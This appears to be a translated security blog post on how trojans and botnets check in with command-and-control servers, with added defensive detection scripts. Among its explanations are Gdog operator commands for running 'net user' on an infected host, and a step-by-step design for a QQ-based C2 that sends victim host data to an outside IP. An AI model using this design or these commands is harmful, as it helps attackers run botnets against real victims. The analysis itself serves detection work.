catalogue
1. Traditional trojan check-in methods
2. Newer trojan check-in methods
3. Check-in via QQ nickname
4. Check-in via QQ Zone profile data
5. Check-in via third-party domains
6. Two-stage UDP/TCP hybrid check-in
7. Gmail CNC
8. NetBot check-in with two-step TCP handshake verification
9. IRC Bot
10. WEBSHELL Bot
11. twittor Bot
12. Blaze Telegram Backdoor Toolkit (bt2)
13. WeChat service account Bot
14. smartqq-bot
15. P2P Bot
1. Traditional trojan check-in methods
0x1: Forward (active) connection
The earliest remote-control trojans used "active connection": the zombie client itself listened on a port configured in advance and waited for the controller to connect to it. As the Internet developed further, controlling a host on an internal network from the public Internet became problematic, so this method gradually fell out of use.
0x2: Reverse connection (passive check-in)
This is the mainstream C2 bot check-in method today. A "passive connection" trojan is the exact opposite of the "active connection" kind: the trojan, i.e. the controlled end, initiates the connection to the controller. The controller opens a listening port, and the controlled end connects to the IP address configured for it (usually hard-coded inside the binary).
Two passive check-in methods are common:
1. FTP/HTTP check-in: the trojan's check-in address is an FTP file download link
2. DNS resolution: the trojan's check-in address is a DNS domain name
// At the core both are a kind of proxying: the real, changing check-in IP/PORT is hidden behind a layer of dynamic resolution
1. Check-in via a file (ip.txt) stored on an FTP server
Write an ip.txt on the FTP server whose content is the IP address and port your controller listens on. When your IP address changes, you only have to update the content of ip.txt. When configuring the trojan, simply set the check-in address in the format of the FTP check-in method.
2. Check-in via a file (ip.txt) stored on an HTTP server
Same principle as the FTP server method; only the network protocol differs.
http://www.tekla.pw/ip.txt
3. Check-in via domain name resolution
The C2 trojan statically links a DNS resolver library into its binary and resolves the domain to an IP address at run time before connecting back. DNS is Internet infrastructure, so it gives a stable check-in while letting the target be changed flexibly.
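All three resolver variants above (ip.txt over FTP or HTTP, a DNS name) leave the same footprint on the network: the infected host fetches the same tiny resource at a steady interval before each connection. The following is an added example, not code from the original post, of a triage script that runs over proxy log lines and flags (client, URL) pairs requested at a near-constant interval that never return more than a few hundred bytes. The log format and every host, address and timestamp in the sample are constructed for this example.

```python
"""Added example (not code from the original post): flag periodic fetches of
tiny resources, the traffic shape of an ip.txt dead-drop resolver.

Assumed proxy log format (constructed for this example):
    <epoch_seconds> <client_ip> <method> <url> <status> <response_bytes>
"""
import re
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample log; hostnames, addresses and timestamps are not real.
SAMPLE_LOG = """\
1609459200 10.0.0.5 GET http://dead-drop.example/ip.txt 200 21
1609459260 10.0.0.5 GET http://dead-drop.example/ip.txt 200 21
1609459320 10.0.0.5 GET http://dead-drop.example/ip.txt 200 21
1609459380 10.0.0.5 GET http://dead-drop.example/ip.txt 200 21
1609459440 10.0.0.5 GET http://dead-drop.example/ip.txt 200 21
1609459205 10.0.0.7 GET http://news.example/index.html 200 48213
1609459333 10.0.0.7 GET http://news.example/index.html 200 48517
1609460101 10.0.0.7 GET http://news.example/index.html 200 48002
1609459000 10.0.0.9 GET http://cdn.example/favicon.ico 200 200
1609459005 10.0.0.9 GET http://cdn.example/favicon.ico 200 200
1609459305 10.0.0.9 GET http://cdn.example/favicon.ico 200 200
1609459322 10.0.0.9 GET http://cdn.example/favicon.ico 200 200
"""

LINE_RE = re.compile(r"^(\d+) (\S+) (\S+) (\S+) (\d{3}) (\d+)$")


def parse_log(text):
    """Parse log lines into dicts; malformed lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, client, method, url, status, size = m.groups()
        entries.append({"ts": int(ts), "client": client, "method": method,
                        "url": url, "status": int(status), "bytes": int(size)})
    return entries


def find_beacons(entries, min_hits=4, max_bytes=256, max_jitter=0.2):
    """Return (client, url, mean_interval_s) for every (client, url) pair that
    is fetched at least min_hits times, never returns more than max_bytes, and
    whose inter-request intervals vary by at most max_jitter (stddev / mean).
    """
    by_pair = defaultdict(list)
    for e in entries:
        by_pair[(e["client"], e["url"])].append(e)

    hits = []
    for (client, url), rows in by_pair.items():
        if len(rows) < min_hits:
            continue
        if max(r["bytes"] for r in rows) > max_bytes:
            continue
        times = sorted(r["ts"] for r in rows)
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        if pstdev(gaps) / avg <= max_jitter:
            hits.append((client, url, avg))
    return hits


if __name__ == "__main__":
    for client, url, interval in find_beacons(parse_log(SAMPLE_LOG)):
        print(f"{client} polls {url} every ~{interval:.0f}s with tiny responses")
```

Only the 10.0.0.5 client is flagged: five fetches exactly 60 s apart, 21 bytes each. The news site fails on size and hit count, and the favicon fetches fail on jitter. Legitimate software update checks and health probes produce the same shape, so treat a hit as a lead to pivot on (what connects next, and where) rather than a verdict; raising max_jitter catches beacons with randomised sleep at the cost of more such false positives.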
Relevant Link:
http://www.freebuf.com/articles/terminal/77412.html
2. Newer trojan check-in methods
The thinking behind evading network monitoring devices is easy to understand:
1. Use the common protocols of basic and public services, e.g. HTTP, for communication
2. Two-level or multi-level proxying, decoupling the point-to-point communication
3. Anti-sandbox and anti-monitoring detection techniques
These are analysed one by one below.
3. Check-in via QQ nickname
This is a way of hiding in a public channel.
http://users.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?uins=869655938
The 大灰狼 (Big Grey Wolf) and 獵狐 (Fox Hunter) remote-control trojans use this check-in method (a mix of DNS, IP and QQ nickname).
After fetching the nickname of a given QQ number through the API, the trojan applies a simple decryption algorithm and a Base64 decode to obtain the IP:Port; from there the flow is like that of a client/server bot.
portraitCallBack({"202109629":["http://qlogo2.store.qq.com/qzone/202109629/202109629/100",0,-1,0,0,0,"npmwkqr",0]})
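As an added example (not code from the original post or from either trojan), the following parses a portraitCallBack(...) JSONP body like the one quoted above and triages whether the nickname looks like an encoded value rather than a human name. The "simple algorithm" the trojans apply before Base64 is not described on this page, so the check only asks whether the nickname is itself well-formed Base64 of printable text; it is a triage signal for an analyst looking at a suspicious account, not the trojan's decoder. The second response and its QQ number are constructed.

```python
"""Added example (not code from the original post): parse a
portraitCallBack(...) JSONP body and triage whether the nickname field looks
like an encoded value rather than a human-chosen name.
"""
import base64
import json
import re
import string

JSONP_RE = re.compile(r"^\s*portraitCallBack\((.*)\)\s*;?\s*$", re.S)
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")

# Response quoted on this page; the nickname is the seventh element (index 6).
PAGE_RESPONSE = ('portraitCallBack({"202109629":["http://qlogo2.store.qq.com/'
                 'qzone/202109629/202109629/100",0,-1,0,0,0,"npmwkqr",0]})')

# Constructed response (not real data); the nickname is Base64 of "127.0.0.1:443".
CONSTRUCTED_RESPONSE = ('portraitCallBack({"100000":["http://example.invalid/100",'
                        '0,-1,0,0,0,"MTI3LjAuMC4xOjQ0Mw==",0]})')


def parse_portrait(jsonp):
    """Return {qq_number: nickname} from a portraitCallBack JSONP body."""
    m = JSONP_RE.match(jsonp)
    if not m:
        raise ValueError("not a portraitCallBack payload")
    data = json.loads(m.group(1))
    return {uin: fields[6] for uin, fields in data.items()}


def looks_like_encoded(nick):
    """True if the nickname is well-formed Base64 that decodes to printable ASCII.

    Short names and names with characters outside the Base64 alphabet are
    rejected up front; real nicknames that happen to be valid Base64 almost
    always decode to non-printable bytes and are rejected by the last check.
    """
    if len(nick) < 8 or len(nick) % 4 or not B64_RE.fullmatch(nick):
        return False
    try:
        raw = base64.b64decode(nick, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return bool(raw) and all(chr(b) in string.printable for b in raw)


def triage(jsonp):
    """Map each QQ number in the response to a (nickname, suspicious) pair."""
    return {uin: (nick, looks_like_encoded(nick))
            for uin, nick in parse_portrait(jsonp).items()}


if __name__ == "__main__":
    for body in (PAGE_RESPONSE, CONSTRUCTED_RESPONSE):
        for uin, (nick, suspicious) in triage(body).items():
            print(f"{uin}: {nick!r} encoded={suspicious}")
```

The nickname from the page ("npmwkqr") is not flagged: it is too short and not a multiple of four characters. A nickname that decodes cleanly to printable text is flagged for a closer look, which is the point at which an analyst would apply whatever extra transform the sample under analysis uses.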
Relevant Link:
http://drops.wooyun.org/papers/14412
4. Check-in via QQ Zone profile data
Like the QQ nickname method, this writes the encrypted check-in information to a place that is publicly reachable over HTTP/API/JSON, usually social media (for better concealment). For the trojan this adds one network I/O fetch and one decryption step; everything else is as in the traditional check-in methods.
Relevant Link:
http://blogs.360.cn/360safe/2014/08/29/cnc_trojan_and_fake_proto/
5. Check-in via third-party domains
The "third-party domain" such a trojan uses is really a third-party website on which the author can write, and promptly modify, their own communication data. Trojan authors tend to look for well-known sites that at least will not go down, so as to keep persistent control over the zombies. There are many such sites, blogging platforms for example. A blog post can be published in advance with control commands embedded in it; the specially crafted trojan then fetches the commands, and it can also simulate editing the post to write back the execution results.
The drawback of this approach is that it cannot carry bulk data. Features like file transfer are possible, but the "user experience" is poor, so trojans with this check-in method are mostly used as covert backdoors that only need a file download and a CMD shell capability.
Relevant Link:
http://www.freebuf.com/articles/terminal/77412.html
6. Two-stage UDP/TCP hybrid check-in
This is similar to the anti-sandbox mindset: the trojan exploits the fact that a malware network sandbox usually runs in an isolated, disconnected environment, probes for the sandbox, and if it detects one it hides its real C&C login behaviour, thereby evading packet-capture detection.
Relevant Link:
http://www.freebuf.com/articles/system/74679.html
7. Gmail CNC
Gdog is a Python-based Windows backdoor that uses Gmail as its command and control server, which gives it the advantage of stealth.
0x1: Features
1. Encrypted communications (AES) + SHA256 hashing
2. A unique id generated from system information (SHA256 hash)
3. Job IDs are random SHA256 hashes
4. Retrieve system information
5. Retrieve geolocation (city, country, longitude, latitude, etc.)
6. List running processes, services, users and devices (hardware)
7. List clients
8. Execute system commands
9. Download files from the client
10. Upload files to the client
11. Execute shellcode
12. Take screenshots
13. Lock the client's screen
14. Keylogging
15. Shut down or reboot the remote computer
16. Log off the current user
17. Download files from the web
18. Visit websites
19. Show the user a message box
0x2: Setup
1. A Gmail account
2. Turn on "Allow less secure apps" in the account's security settings
3. Enable IMAP in the account settings
0x3: Bot Client
Like most bot clients, the client consists of the following main parts:
1. Collect information about the current host, encrypt it (optional) and send it to the C2 end (proxied through Gmail mail)
2. A C2 message parsing module
3. Function modules implementing the individual capabilities (keylogger, screenshot, cmd, ...)
1. Check-in
The client sends its information, encrypted, to the designated Gmail account; the mail subject is the client id.
2. Executing commands
The bot client periodically fetches the latest "command mails" from the Gmail mailbox, executes them, and sends the results back to the mailbox. Clearly the bot client follows a typical decoupled architecture.

{'res': ['0;System Idle Process', '4;System', '320;smss.exe', '444;csrss.exe', '548;wininit.exe', '620;services.exe', '628;lsass.exe', '724;svchost.exe', '788;svchost.exe', '300;svchost.exe', '304;svchost.exe', '8;svchost.exe', '1060;svchost.exe', '1068;svchost.exe', '1092;svchost.exe', '1200;WUDFHost.exe', '1296;igfxCUIService.exe', '1324;svchost.exe', '1428;ibmpmsvc.exe', '1528;QQPCRTP.exe', '1732;WUDFHost.exe', '1864;WUDFHost.exe', '1852;vpnagent.exe', '2172;spoolsv.exe', '2496;svchost.exe', '2520;mDNSResponder.exe', '2528;AppleMobileDeviceService.exe', '2564;ibtsiva.exe', '2672;pcas.exe', '2708;QQProtect.exe', '2724;secbizsrv.exe', '2732;TenpayServer.exe', '2888;SynTPEnhService.exe', '2904;svchost.exe', '2988;svchost.exe', '2996;TBSecSvc.exe', '3008;TsService.exe', '3016;valWBFPolicyService.exe', '3052;vmware-authd.exe', '3060;valWbioSyncSvc.exe', '1588;vmware-usbarbitrator64.exe', '1584;vmnetdhcp.exe', '2464;vmnat.exe', '3144;wwbizsrv.exe', '3356;dasHost.exe', '3464;WmiPrvSE.exe', '3736;vmware-hostd.exe', '5664;PresentationFontCache.exe', '6492;GoogleUpdate.exe', '16084;QQMusicService.exe', '8280;OfficeClickToRun.exe', '6732;SearchIndexer.exe', '5956;dllhost.exe', '13108;csrss.exe', '16968;winlogon.exe', '12128;dwm.exe', '18876;SynTPEnh.exe', '8052;SensorDBSynch.exe', '5288;sihost.exe', '8336;conhost.exe', '7200;taskhostw.exe', '11464;igfxEM.exe', '16660;SynTPHelper.exe', '11348;explorer.exe', '19204;aliwssv.exe', '5928;conhost.exe', '10036;RemindersServer.exe', '8200;SynTPLpr.exe', '12400;SynLenovoHelper.exe', '16916;ShellExperienceHost.exe', '2664;TSVNCache.exe', '16288;RuntimeBroker.exe', '10412;SearchUI.exe', '720;SettingSyncHost.exe', '11592;QQPCTray.exe', '18176;QQPCNetFlow.exe', '12444;QQPCRealTimeSpeedup.exe', '13812;AliLangAgent.exe', '17896;AliLangClient.exe', '19792;yunpan.exe', '16812;FileEncryptionSvr.exe', '9316;alineiwai.exe', '19816;vmware-tray.exe', '18336;svchost.exe', '13660;RAVCpl64.exe', '18096;RAVBg64.exe', '10572;TXPlatform.exe', 
'12936;DingTalk.exe', '1516;DingTalk.exe', '15956;DingTalk.exe', '12768;DingTalk.exe', '15508;AliIM.exe', '16100;AliApp.exe', '11996;TaobaoProtect.exe', '7284;QQBrowser.exe', '9896;firefox.exe', '6368;QQBrowser.exe', '13520;qqbrowser.exe', '11364;chrome.exe', '17372;chrome.exe', '5124;360se.exe', '5924;chrome.exe', '9664;pycharm.exe', '17432;qqbrowser.exe', '15416;ONENOTE.EXE', '19840;360se.exe', '13364;chrome.exe', '17064;sublime_text.exe', '11028;360se.exe', '13040;qqbrowser.exe', '12556;qqbrowser.exe', '19872;qqbrowser.exe', '15204;360se.exe', '11992;cmd.exe', '16600;cmd.exe', '9052;conhost.exe', '13096;conhost.exe', '15580;360se.exe', '19172;QMChExt.exe', '12876;QMChExt.exe', '16536;qqbrowser.exe', '15424;qqbrowser.exe', '16024;ONENOTEM.EXE', '6152;fsnotifier.exe', '13480;conhost.exe', '10452;SkypeHost.exe', '13048;QQDownload.exe', '1276;editplus.exe', '6440;SystemSettingsBroker.exe', '17368;NetworkUXBroker.exe', '16404;fontdrvhost.exe', '18968;AliIM.exe', '13704;AliApp.exe', '5624;360se.exe', '15552;Xshell.exe', '7336;XshellCore.exe', '12700;filezilla.exe', '16980;chrome.exe', '896;QQMusic.exe', '20040;QQMusicExternal.exe', '20356;QQMusicExternal.exe', '19228;QQMusicIE.exe', '32;QQMusicExternal.exe', '13904;audiodg.exe', '17796;FMAPP.exe', '8104;chrome.exe', '16344;wampmanager.exe', '5512;httpd.exe', '6392;mysqld.exe', '9096;httpd.exe', '10592;ApplicationFrameHost.exe', '10556;Calculator.exe', '1056;Microsoft.Photos.exe', '17112;chrome.exe', '5044;chrome.exe', '19028;chrome.exe', '3264;SystemSettings.exe', '6984;chrome.exe', '10344;chrome.exe', '6912;360se.exe', '12344;360se.exe', '19640;QQ.exe', '1156;QQExternal.exe', '18984;qqbrowser.exe', '2596;cmd.exe', '7328;conhost.exe', '16524;360se.exe', '5888;360se.exe', '4188;360se.exe', '2748;SearchProtocolHost.exe', '10756;WmiPrvSE.exe', '18776;SearchFilterHost.exe', '9596;python.exe', '7912;conhost.exe'], 'cmd': 'tasks'}
0x4: Bot CNC
1. Listing the clients currently online
The CNC is completely decoupled from the bot client; the CNC discovers which hosts are online by checking Gmail mail.
python gdog.py -info -id b6b5164785a94ca60c6a360df4f800a45b3d3b26233443536c0acab902d0b779
2. Sending a command to a bot client and retrieving the result
python gdog.py -cmd "net user" -id b6b5164785a94ca60c6a360df4f800a45b3d3b26233443536c0acab902d0b779

The bot client's result again comes back by mail, so the CNC has to actively "try to fetch" the result.
python gdog.py -jobid 2b680930e5bd74ef9e5dca9ee8ff3fe2d20f57cfce693da341d9c10aae52065d -id b6b5164785a94ca60c6a360df4f800a45b3d3b26233443536c0acab902d0b779
gcat works similarly.
Relevant Link:
http://www.freebuf.com/sectool/105144.html
https://github.com/byt3bl33d3r/gca
8. NetBot check-in with two-step TCP handshake verification
1. Bot Client -> CNC: 00000011f4000000354c6d80b0ff7600
/* 1. anti-sandbox: the real check-in request is only sent once the C2 is confirmed alive 2. anti-scanner: against an ordinary single-interaction scanner, a C2 designed this way is somewhat harder to spot */
2. CNC -> Bot Client: TCP ACK
3. Bot Client -> CNC: b4b2b1b8b2b6b2b8adb1b5b3b9c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2b5b1b48d84c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c29769709a92a29392b3c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2b1acb4b4b9b68d8a7cc2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2b1b9b4b0b1b8bab0b1b1b4b0b1b3b5c2b4b2b1b8b2b5b3b2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c262c2c2c2
4. Check-in succeeded
5. CNC -> Bot Client (periodic heartbeat packets): 03000000000000000000000000000000
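The exchange above has a shape a network analyst can test for without knowing the protocol: a fixed-size probe first, a much larger second client message dominated by runs of one repeated byte (0xc2 here, sitting where a structured message would have zero padding), and a fixed-size server heartbeat with one type byte followed by zeros. The following is an added example, not code from the original post or from NetBot, that applies those heuristics to a session given as (direction, hex payload) tuples as pulled from a capture. The payloads are the ones quoted above; the page does not state the encoding scheme, so the code records the repeated-byte run and nothing more.

```python
"""Added example (not code from the original post): heuristic flags for a TCP
session shaped like the NetBot check-in quoted on this page.

Input is a list of (direction, hex_payload) tuples as an analyst would pull
them from a capture; the step-2 TCP ACK carries no payload and is omitted.
"""
from itertools import groupby

# The three payload-bearing packets quoted on this page.
NETBOT_SESSION = [
    ("c2s", "00000011f4000000354c6d80b0ff7600"),
    ("c2s", "b4b2b1b8b2b6b2b8adb1b5b3b9c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2b5b1b48d84c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c29769709a92a29392b3c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2b1acb4b4b9b68d8a7cc2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2b1b9b4b0b1b8bab0b1b1b4b0b1b3b5c2b4b2b1b8b2b5b3b2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c262c2c2c2"),
    ("s2c", "03000000000000000000000000000000"),
]


def from_hex_dump(text):
    """Decode a hex dump; whitespace and a trailing half-byte from a truncated
    dump are dropped rather than aborting the whole analysis."""
    clean = "".join(text.split())
    return bytes.fromhex(clean[: len(clean) // 2 * 2])


def longest_run(data):
    """(length, byte_value) of the longest run of one repeated byte."""
    best = (0, None)
    for value, group in groupby(data):
        n = sum(1 for _ in group)
        if n > best[0]:
            best = (n, value)
    return best


def analyze_session(packets, probe_len=16, min_run=32):
    """Return a dict of heuristic flags; an empty dict means nothing matched.

    short_probe_first      first client payload is exactly probe_len bytes
    large_second_message   second client payload is more than 4x the probe
    repeated_byte_padding  a later client payload has >= min_run equal bytes
    fixed_heartbeat        a server payload is probe_len bytes: one non-zero
                           type byte followed by zeros
    """
    flags = {}
    c2s = [from_hex_dump(h) for d, h in packets if d == "c2s"]
    s2c = [from_hex_dump(h) for d, h in packets if d == "s2c"]

    if c2s and len(c2s[0]) == probe_len:
        flags["short_probe_first"] = True
    if len(c2s) >= 2 and len(c2s[1]) > 4 * len(c2s[0]):
        flags["large_second_message"] = True

    runs = [longest_run(p) for p in c2s[1:]]
    if runs:
        n, value = max(runs, key=lambda r: r[0])
        if n >= min_run:
            flags["repeated_byte_padding"] = (n, f"{value:02x}")

    for p in s2c:
        if len(p) == probe_len and p[0] != 0 and not any(p[1:]):
            flags["fixed_heartbeat"] = p[0]
    return flags


if __name__ == "__main__":
    print(analyze_session(NETBOT_SESSION))
```

A plain HTTP request as the first client payload produces no flags. All four flags together are a strong match for this family; the repeated-byte run on its own is the weakest signal, since any padded binary protocol encoded with a constant single-byte key looks the same, but it is exactly the kind of observation that tells an analyst to try that key against the rest of the message.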
9. IRC Bot
IRC relay networking is used to manage communication between the CNC and the bot clients. In real-world cases the following have been encountered:
1. PHP IRC Bot
2. Perl IRC Bot
Relevant Link:
http://www.cnblogs.com/LittleHann/p/5215766.html
http://www.cnblogs.com/LittleHann/p/5394926.html
10. WEBSHELL Bot
A WEBSHELL bot is not essentially new technology. Its logical architecture is the same as the gmail bot / irc bot: the client initiates asynchronous polling for commands, sends the execution results back, and waits for the CNC to retrieve them asynchronously.
Relevant Link:
http://www.cnblogs.com/LittleHann/p/5507555.html
11. twittor Bot
A stealthy Python based backdoor that uses Twitter (Direct Messages) as a command and control server. This project has been inspired by Gcat which does the same but using a Gmail account.
Relevant Link:
https://github.com/PaulSec/twittor
12. Blaze Telegram Backdoor Toolkit (bt2)
0x1: Introduction
1. Telegram
1. A cross-platform real-time messaging application
2. Supports Android, iPhone/iPad, WP, Web, PC/Mac/Linux
3. Encrypted communications: Telegram Encryption
4. Supports sending all file types
5. Open API; custom clients can be developed
2. Bots: third-party applications built into Telegram, communicating over HTTPS and functioning like chat bots
1. Get customized notifications and news
2. Integrate with other services
3. Create custom tools
4. Build single- and multiplayer games
5. Build social services
6. Do virtually anything else
Relevant Link:
http://drops.wooyun.org/tips/16142
https://blog.blazeinfosec.com/bt2-leveraging-telegram-as-a-command-control-platform/
https://github.com/nickoala/telepot
https://github.com/blazeinfosec/bt2
13. WeChat service account Bot
Unlike the Gmail bot, a WeChat official account / Telegram bot can implement simple "chat bot" functionality. This removes the step of polling Gmail for mail and reduces the coding overhead of heartbeats and returning messages; the result is like a simple Turing machine.
0x1: Applying for a personal WeChat service account
WeChat sets an entry threshold for applicants; a service account is only granted after going through an application process.
Relevant Link:
https://www.zhihu.com/question/20492916
http://kf.qq.com/faq/120322fu63YV130422AJbaI3.html
14. smartqq-bot
0x1: Installation and startup
apt-get install npm
apt-get install node
npm install -g smartqq-bot
nodejs /usr/local/lib/node_modules/smartqq-bot/main.js
http://114.55.36.222:3100/
Then scan the QR code with the mobile QQ app to log in.
0x2: Accessing the API
http://114.55.36.222:3200/send?type=[group|buddy|discuss]&to=[qqnumber/nick/gname]&msg=[msg]
http://114.55.36.222:3200/send?type=group&to=198167523&msg="test for bot"
http://114.55.36.222:3200/send?type=buddy&to=753125749&msg=hello

0x3: CNC QQ
The QQ account used to deploy the CNC is the one we logged into via Smart QQ by scanning the QR code. A QQ-based CNC can be built along the following lines:
1. After starting, the bot client, like ordinary malware, sets up persistence (registering a service, memory injection, registry run keys, etc.) and collects local host information, e.g. windwos%20xp%20sp3|2GMhz|8GM|2CPU|ver:bot1.0|127.0.0.1
2. The bot client sends the check-in information to the Proxy QQ through the Smart QQ API: http://114.55.36.222:3200/send?type=group&to=媽媽說名字長會有人粉&msg=windwos%20xp%20sp3|2GMhz|8GM|2CPU|ver:bot1.0|127.0.0.1
3. The Proxy QQ (Node.js server) has two jobs:
1) Forward the message to the QQ Group CNC; it could even start another Smart QQ instance to operate the QQ Group CNC
2) Record the bot client's check-in information (operating system, bandwidth, memory, CPU cores, etc.)
4. Following a custom protocol, receive "cmd commands" from the QQ Group CNC, e.g. list, and keep the received commands in an in-memory queue for the bot client to fetch
5. The bot client periodically fetches the latest "cmd command" from the Proxy QQ, executes it locally, and sends the result back to the Proxy QQ through the same Smart QQ API; the Proxy QQ can log it to a back-end DB and forward it to the QQ Group CNC
6. This completes a full command exchange between bot client and CNC
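From the defender's side, the weak point of the design above is step 2: the host information travels as a pipe-delimited string inside an ordinary HTTP query parameter, so it is visible in any web proxy log. The following is an added example, not code from the original post or from smartqq-bot, that scans request logs for query values with that shape (several pipe-separated fields, one of them ver:<something>, one a dotted IPv4 address) and names the fields. The log format is constructed; the field order os|cpu|memory|cores|ver:<version>|ip is read off the sample value quoted above, and a different bot would need its own mapping.

```python
"""Added example (not code from the original post): pull pipe-delimited
host-information check-ins, as in the sample value quoted on this page, out of
HTTP request logs.

Assumed log format (constructed): "<client_ip> <method> <url>".
"""
import re
from urllib.parse import parse_qs, urlsplit

IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# Positional names for the sample's field order; an assumption from the sample.
FIELD_NAMES = ("os", "cpu", "memory", "cores", "version", "ip")

# Constructed log lines; the first msg value is the check-in string from this page.
SAMPLE_REQUESTS = """\
10.0.0.5 GET http://114.55.36.222:3200/send?type=group&to=198167523&msg=windwos%20xp%20sp3|2GMhz|8GM|2CPU|ver:bot1.0|127.0.0.1
10.0.0.7 GET http://114.55.36.222:3200/send?type=buddy&to=753125749&msg=hello
10.0.0.9 GET http://shop.example/search?q=red%20shoes|size%2042|colour%20blue|sort%20asc
"""


def parse_checkin(value, min_fields=4):
    """Return a field dict if value has the check-in shape, else None.

    Shape: at least min_fields pipe-separated fields, one starting with
    "ver:" and one that is a dotted IPv4 address. The version and ip keys
    are taken from the matching fields wherever they appear.
    """
    fields = value.split("|")
    if len(fields) < min_fields:
        return None
    versions = [f[4:] for f in fields if f.startswith("ver:")]
    ips = [f for f in fields if IPV4_RE.match(f)]
    if not versions or not ips:
        return None
    named = dict(zip(FIELD_NAMES, fields))
    named["version"] = versions[0]
    named["ip"] = ips[0]
    return named


def extract_checkins(log_text):
    """Scan every query-string value of every request for a check-in string."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split(None, 2)
        if len(parts) != 3:
            continue
        client, _method, url = parts
        query = parse_qs(urlsplit(url).query, keep_blank_values=True)
        for values in query.values():
            for value in values:  # parse_qs already percent-decodes
                info = parse_checkin(value)
                if info is not None:
                    hits.append((client, info))
    return hits


if __name__ == "__main__":
    for client, info in extract_checkins(SAMPLE_REQUESTS):
        print(f"{client} reported {info['os']} running {info['version']}")
```

Only the first line is reported; the shop search has four pipe-separated fields but neither a version tag nor an address. Because the check is on the value rather than on the destination host, it keeps working when the Proxy QQ moves to another IP or the bot is pointed at a different relay.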
Relevant Link:
https://www.npmjs.com/package/smartqq-bot
https://github.com/ScienJus/qqbot
http://www.scienjus.com/webqq-analysis-1/
https://github.com/xqin/SmartQQ-for-Raspberry-Pi/blob/master/WebQQ.py
https://github.com/ScienJus/smartqq
15. P2P Bot
a modified variant of Zeusbot/Spyeye which uses peer-to-peer (P2P) architecture to communicate. The original Zeusbot communicated directly with its C&C server to download configuration data and upload stolen information. This was a major point of failure for the bot because the C&C server could be blocked or taken down, and the attacker would lose control of the botnet. The bot did have a fallback strategy: if the C&C server was down it generated pseudo-random domain names to contact. The attacker could of course predict those domain names and register one in order to gain back control of the bot, but the solution was not very efficient. (Terminology note: although we use the term “C&C” for the main server controlled by the attackers, this server is not a typical C&C in its functionalities, but is mainly a collector of information from the drones.)
The drawback of the traditional centralized client/server CNC bot is its centralization: if the CNC at the centre of the network topology fails, then regardless of whether the zombie bots are still alive, the bot operator has no way to "instruct" the surviving zombies to point at a new CNC, because the old CNC, their only channel of communication, is gone.
A P2P network solves this. Bots no longer talk TCP directly to a central CNC but use a peer-to-peer protocol to talk to all the other zombies, and new zombies can easily "join the network" through the P2P protocol. The bots share a dynamic IP list file (another layer of proxying on top of P2P), so when a C2 server fails the operator can easily rejoin the network and "spread" a new check-in IP list, making the surviving zombies check in again. P2P solves the problem of how to notify the zombie bots after the C2 CNC has failed.
To overcome these limitations the attackers have now decided to use P2P. This modified variant of Zeusbot/Spyeye contains a list of IP addresses to contact. These IPs are not servers; they are other infected clients (peers). These clients provide configuration data, which in turn contains the URL of the main C&C server. In this modified way, even if the C&C server is taken down, the P2P network remains alive and can be fuelled with a new configuration file pointing to a new URL for a new C&C server. Can the P2P network be shut down? No (at least, not easily). The IP addresses in the P2P network cannot be blocked because, in most cases, they would be normal broadband IPs (home users and work computers, for instance) and blocking them would disrupt legitimate network traffic. Also, the list of peers can update so frequently that tracking them proves difficult. Using a P2P network this way is more resistant than just a single C&C URL, and can considerably prolong a botnet’s lifetime.
0x1: How it runs
1. When run, the bot injects itself into the “explorer.exe” process, and tries to contact all the IP addresses one-by-one using UDP. This communication protocol is not complex. It can exchange several data packets with specific codes and meanings and, to identify the communications, have the peers use SHA-1 codes to keep track of the data.
2. To initiate a communication the bot sends out a “portknocking” data packet that contains a header with the SHA-1 of the infected machine and the SHA-1 of the contacted machine.
3. Every infected machine (peer) has its own unique identifier SHA-1 and every bot contains a list of SHA-1 : IP couples which represent unique hosts on the P2P network. After the portknocking packet is accepted by a peer, the reply to the portknocking includes a new list of peers (SHA-1 : IP couples again). This keeps the P2P network updated with a list of new machines.
4. More UDP packets may follow the portknocking, exchanging different data

When the UDP communication is complete, the bot will then proceed to contact the peer through TCP. At this stage the bot can receive both a configuration file or an update of the bot itself. The decrypted configuration data contains the address of the C&C server which the bot contacts through a simple HTTP POST request. The bot then sends data about the infected machine (name of the machine and other information) to the C&C server.
0x2: Fully P2P
With the latest update, it seems that the C&C server has disappeared entirely for this functionality. Where they were previously sending and receiving control messages to and from the C&C, these control messages are now handled by the P2P network.
This means that every peer in the botnet can act as a C&C server, while none of them really are one. Bots are now capable of downloading commands, configuration files, and executables from other bots—every compromised computer is capable of providing data to the other bots.
While these changes make the botnet more resistant to takedown, and equally more difficult to track the attackers behind it, it also provides another major benefit to the attackers.
By rebuilding the network architecture on P2P, the botnet is entirely freed from the risk of the CNC node failing.

0x3: More UDP, less TCP
